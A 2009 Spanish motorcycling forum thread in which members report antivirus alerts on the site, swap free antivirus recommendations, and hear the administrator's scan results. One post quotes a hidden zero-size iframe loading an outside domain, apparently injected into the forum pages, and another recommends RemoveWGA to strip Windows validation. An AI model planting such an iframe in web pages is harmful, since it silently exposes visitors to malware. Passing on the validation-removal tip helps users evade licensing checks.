El nuevo Reglamento General Europeo de Protección de Datos (GDPR) entrará en vigencia el 25 de mayo de 2018. Queremos asegurarte que epifumi.com se toma en serio sus datos personales y está tomando todas las medidas necesarias para cumplir con esta regulación GDPR. Para ayudarlo a comprender lo que esto significa para usted y los pasos que hemos dado para garantizar la protección de sus datos personales, hemos actualizado nuestra Politica de Privacidad y los Términos de Servicio. La Politica de Privacidad y los Términos de Servicio actualizados entran en vigencia automáticamente para todos los usuarios de epifumi.com el 25 de mayo de 2018. Si continúa utilizando nuestro servicio, acepta los cambios a estas políticas. Un saludo. OK Más Información.

Autor Tema: ¿Virus en Epifumi?  (Leído 4674 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Feoman

  • campeón 250
  • ****
  • Mensajes: 1342
¿Virus en Epifumi?
« en: 28 de Marzo de 2009, 16:12:35 pm »
Buenas

Cada vez que entro al foro o doy un clic dentro de él, me sale esto:



¿Me sale solo a mí? ¿Es una cagada del Avast?

Si os parece, moveis esto al Off Topic, pero poniéndolo aquí sé que lo va a ver más gente.

Saludos

Desconectado Fuji

  • Marciano
  • ******
  • Mensajes: 4563
Re: ¿Virus en Epifumi?
« Respuesta #1 en: 28 de Marzo de 2009, 16:18:48 pm »
A mi no me sale nada de eso...

Desconectado Carlinhos

  • campeón 125
  • ***
  • Mensajes: 968
Re: ¿Virus en Epifumi?
« Respuesta #2 en: 28 de Marzo de 2009, 16:40:02 pm »
A mi tampoco me sale desde ninguno de los 4 PCs desde los que me suelo conectar (aunque dos no tienen antivirus...)

Pero por curiosidad he echado un ojo por el internete y he encontrado varias referencias a ese "virus", pero no me queda claro si realemente es un virus o no (mi inglés no es ninguna maravilla)... os pongo alguno de los enlaces por si alguien controla de este tema:

http://www.lavasoftsupport.com/index.php?showtopic=24014 --> Según estos no es un virus??
http://foros.zonavirus.com/viewtopic.php?f=5&t=27741 --> Aquí lo mezclan con el virut.56, pero no sé si están relacionados o simplemente que al tio se le han juntado los dos (esta está en español)
http://forum.avast.com/index.php?topic=43311.0 --> He probado a ver el código fuente de las páginas del foro y aparece "<iframe src="http://google-stat.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>", pero no sé si lo ha puesto Epi a propósito o lo ha inyectado algún virus...
« última modificación: 28 de Marzo de 2009, 16:43:07 pm por Carlinhos »
----------------------------------------------------------------------------------------------------------------------------------------------

- No hay nada repartido de modo más equitativo en el mundo que la razón: Todo el mundo está convencido de tener suficiente

- Para investigar la verdad es preciso dudar, en cuanto sea posible, de todas las cosas

- Consulta el ojo de tu enemigo, porque es el primero que ve tus defectos

Desconectado Tormo4ever

  • King Kenny
  • *******
  • Mensajes: 14331
Re: ¿Virus en Epifumi?
« Respuesta #3 en: 28 de Marzo de 2009, 18:53:05 pm »
A mí me sale también un aviso cada vez qeu cambio de página dentro de epifumi




Qué tiempos aquellos con los Malasombra Bros., Pólux Crivillé, Renzo Oliveri  ... los primeros días del gp500

Desconectado Rasmien

  • Marciano
  • ******
  • Mensajes: 4885
  • Mezclainómano perdío
  • Moto: "la bizca"
Re: ¿Virus en Epifumi?
« Respuesta #4 en: 28 de Marzo de 2009, 19:12:44 pm »
Ayer oí un comentario de que los administradores de sistemas de tos laos están hasta arriba de faena por culpa de los virus. Si han llegado hasta aquí, me pilla sin antivirus en casa. Verás que risa.

Afortunadamente me pilla con el disco de datos desconectao...

Desconectado James

  • campeón Motogp
  • *****
  • Mensajes: 3757
  • Moto: The Power Of Dreams....
Re: ¿Virus en Epifumi?
« Respuesta #5 en: 28 de Marzo de 2009, 19:46:44 pm »
Wenas

Pues a mi no me ha salido nada parecido.

Ya que estamos liaos con el tema, una pregunta para informáticos, que antivirus tenéis?Cual me recomendáis?...que sea gratix...

Yo uso el AVG que, en principio, me funciona a las mil maravillas, pero siempre te queda esa duda de si no da problemas por ser bueno o por ser malísimo de la muerte.

salU2  :moto

Desconectado Feoman

  • campeón 250
  • ****
  • Mensajes: 1342
Re: ¿Virus en Epifumi?
« Respuesta #6 en: 28 de Marzo de 2009, 20:35:59 pm »
Buenas

He estado curioseando un poco porque esto me mosquea. Podría ser un problema de la última actualización del antivirus o ser algo real. El hecho de que a Tormo le pase algo parecido puede ser mala señal.

Por lo que he podido ver, podría ser (si realmente es algo) algún problemilla en el index.php de la página. Por curiosidad he indagado un poco con algunos servicios de búsqueda online de malware que hay por la web.

LinkScanner no encuentra nada. Online Link Scan tampoco. Sin embargo, Wepawet sí que encuentra algo sospechoso. En fín, que no sé qué pensar. Ojalá no sea nada pero no se...

Saludos

Desconectado James

  • campeón Motogp
  • *****
  • Mensajes: 3757
  • Moto: The Power Of Dreams....
Re: ¿Virus en Epifumi?
« Respuesta #7 en: 28 de Marzo de 2009, 20:40:15 pm »
Wenas

No se si tiene nada que ver, supongo que no, pero en otro foro que frecuento (tb php) el otro día se recibió un ataque masivo de spam, de virus, de trol o de algo a no se como llamarle.

En todos los subforos de ese foro aparecieron como 20 ó 30 mensajes con un papa noel en el post.

salU2  :moto

Desconectado Feoman

  • campeón 250
  • ****
  • Mensajes: 1342
Re: ¿Virus en Epifumi?
« Respuesta #8 en: 28 de Marzo de 2009, 20:41:01 pm »
Hola James

Wenas

Pues a mi no me ha salido nada parecido.

Ya que estamos liaos con el tema, una pregunta para informáticos, que antivirus tenéis?Cual me recomendáis?...que sea gratix...

Yo uso el AVG que, en principio, me funciona a las mil maravillas, pero siempre te queda esa duda de si no da problemas por ser bueno o por ser malísimo de la muerte.

salU2  :moto

Como ves, yo uso Avast. Hasta ahora estoy contento. Es gratis y actualiza muy a menudo (a veces, más de una vez al día). Eso sí, si esto termina siendo un falso positivo a lo mejor cambio de opinión sobre su calidad :lol. Veremos...

Saludos

Desconectado mak46

  • campeón 250
  • ****
  • Mensajes: 2366
Re: ¿Virus en Epifumi?
« Respuesta #9 en: 28 de Marzo de 2009, 20:51:20 pm »
Hola,
Para responder un poco a la pregunta de James, dentro de los antivirus gratuitos hay 3 que destacan que son el Avg, el Avast y el avira. A mi personalmente me gusta mas el Avast, pero por la baja velocidad de coneccion estoy utilizando el avira, que es mucho mas ligero.
En cuanto a la efectividad ningun antivirus es 100 % efectivo, ni los de pago ni los free.
Para olvidarse permanentemente de los virus lo mejor es usar un sistema operativo diferente de windows. En este sentido los 2 que conozco son MAC (de pago) y LINUX (gratuito), el segundo es sofware libre y se puede conseguir desde la pagina de ubuntu, completamente gratis. Eso si antes asegurarse de que el hardware de sus ordenadores es compatible con estos sistemas si quereis cambiar de sistema operativo. Como ejemplo en mi portatil he tenido que volver a instalar windows debido a que no he encontrado los drivers NEC de mi lectora de dvd.

Volviendo al tema de este virus en concreto a mi no me ha dado problemas con ninguno de los 2 antivirus que uso normalmente, Avast y Avira. y estan configurados en una proteccion alta.

Bueno Saludos.

PD: si alguien tiene problemas con la validacion de windows descarguen REMOVEWGA, luego lo ejecutan, saca toda la porqueria que te instala microsoft para comprobar si le regalas dinero a ellos o no.

PD: si alguien quiere una alternativa al office, prueben el openoffice, es mas completo y gratis.


Ahora si Saludos a todos.
"En esta vida no te perdonan si dejas de ganar, y te odian si ganas siempre." Jorge Valdano

"Si te alegras de los fracasos de los demas, es que en tu vida tienes muy poco que celebrar"

Desconectado Epifumi

  • Administrador
  • King Kenny
  • *****
  • Mensajes: 7802
  • Moto: BMW R1200GS LC
Re: ¿Virus en Epifumi?
« Respuesta #10 en: 28 de Marzo de 2009, 21:06:58 pm »
Hola:

Que yo sepa no pasa nada. Pero claro, yo no uso windows por lo que sería raro que me afectara. La versión del foro es la última y mas segura y los únicos scripts que hay son los de ademails e hitstat que son los de las estadísticas, no sospechosos. De hecho, en el análisis de Wepawet es lo que sale. Además, da como resultado "No exploits were identified. "

Vamos, yo no me preocuparía, pero claro, si os sale cada vez debe ser un coñazo. ¿tenéis el navegador actualizado? Lo digo porque hoy ha salido la 3.0.8 de Firefox


Sígueme en Spotify" title="Sígueme en Spotify

Desconectado Feoman

  • campeón 250
  • ****
  • Mensajes: 1342
Re: ¿Virus en Epifumi?
« Respuesta #11 en: 28 de Marzo de 2009, 21:32:56 pm »
Buenas Epi

Hola:

Que yo sepa no pasa nada. Pero claro, yo no uso windows por lo que sería raro que me afectara. La versión del foro es la última y mas segura y los únicos scripts que hay son los de ademails e hitstat que son los de las estadísticas, no sospechosos. De hecho, en el análisis de Wepawet es lo que sale. Además, da como resultado "No exploits were identified. "

Vamos, yo no me preocuparía, pero claro, si os sale cada vez debe ser un coñazo. ¿tenéis el navegador actualizado? Lo digo porque hoy ha salido la 3.0.8 de Firefox

Pues ojalá que no sea nada. Ya he visto que cuando has pedido el análisis (los guarda) te ha dicho que no hay nada sospechoso pero a mí, en el primer análisis me ha dicho esto. De ahí mi preocupación.

Con respecto al navegador, tengo la versión 3.0.7 (aún no me ha avisado de la nueva versión) pero no creo que tenga que ver. He probado con MS IE y me da el mismo error. Es el antivirus el que detecta lo que sea independientemente del navegador. Veré qué hago.

Saludos

P.D.: Por cierto, desde que me salen estos avisos cada vez que hago click por aquí dentro, no me chuta la previsualización de los mensajes. Quizá el antivirus está bloqueando algo que no tiene por qué bloquear, no sé...

Desconectado Epifumi

  • Administrador
  • King Kenny
  • *****
  • Mensajes: 7802
  • Moto: BMW R1200GS LC
Re: ¿Virus en Epifumi?
« Respuesta #12 en: 28 de Marzo de 2009, 22:32:57 pm »
He hecho otro par de análisis y uno ha dado chungo y los demás bien. ¿alguna idea?


Sígueme en Spotify" title="Sígueme en Spotify

Desconectado Ranker

  • campeón 125
  • ***
  • Mensajes: 610
Re: ¿Virus en Epifumi?
« Respuesta #13 en: 29 de Marzo de 2009, 10:44:41 am »
Yo tengo un antivirus "panda carreras cliente" y tengo muy poca idea de informática, menos que de motos, incluso.

El caso es que justo ayer al entrar en el foro por primera vez me salió un mensaje raro de que el panda había bloqueado algo, y luego no me volvió a salir.
Hoy cuando he entrado me lo ha vuelto a poner... (utilizo explorer)

Epi, ponte la bata y la mascarilla y ...a limpiar :lol

pd1. A mi tampoco me deja previsualizar los mensajes.

pd2 ¿¿No será Ezpeleta que nos está poniendo algún control electrónico????  :hysterical

saludos

Desconectado Epifumi

  • Administrador
  • King Kenny
  • *****
  • Mensajes: 7802
  • Moto: BMW R1200GS LC
Re: ¿Virus en Epifumi?
« Respuesta #14 en: 29 de Marzo de 2009, 12:02:16 pm »
Probar ahora


Sígueme en Spotify" title="Sígueme en Spotify